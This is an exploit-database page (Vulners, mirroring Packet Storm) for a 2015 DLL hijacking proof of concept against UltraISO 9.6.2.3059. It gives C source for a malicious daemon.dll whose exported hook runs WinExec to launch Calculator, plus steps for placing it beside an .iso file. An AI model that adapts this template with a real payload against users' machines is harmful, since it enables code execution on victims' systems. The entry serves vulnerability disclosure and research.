Lucene search
K

UltraISO 9.6.2.3059 DLL Hijacking

🗓️ 29 Mar 2015 00:00:00Reported by TUNISIAN CYBERType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

Exploit for UltraISO v9.6.2.3059 using DLL hijacking technique on Windows platforms.

Code
`#[+] Author: TUNISIAN CYBER  
#[+] Exploit Title: UltraISO v9.6.2.3059 DLL Hijacking  
#[+] Date: 28-03-2015  
#[+] Type: Local Exploits  
#[+] Tested on: WinXp/Windows 7 Pro  
#[+] Friendly Sites: sec4ever.com  
#[+] Twitter: @TCYB3R  
#[+] Poc:http://i.imgur.com/naHAdJF.png  
#[+] Create Compile the file then rename it to daemon.dll then create .iso file , make sure that  
# the 2 files are in the same dir.  
#include <windows.h>  
#define DllExport __declspec (dllexport)  
DllExport void hook_startup() { exp(); }  
  
int exp()  
{  
WinExec("calc", 0);  
exit(0);  
return 0;  
}  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Mar 2015 00:00Current
0.2Low risk
Vulners AI Score0.2
20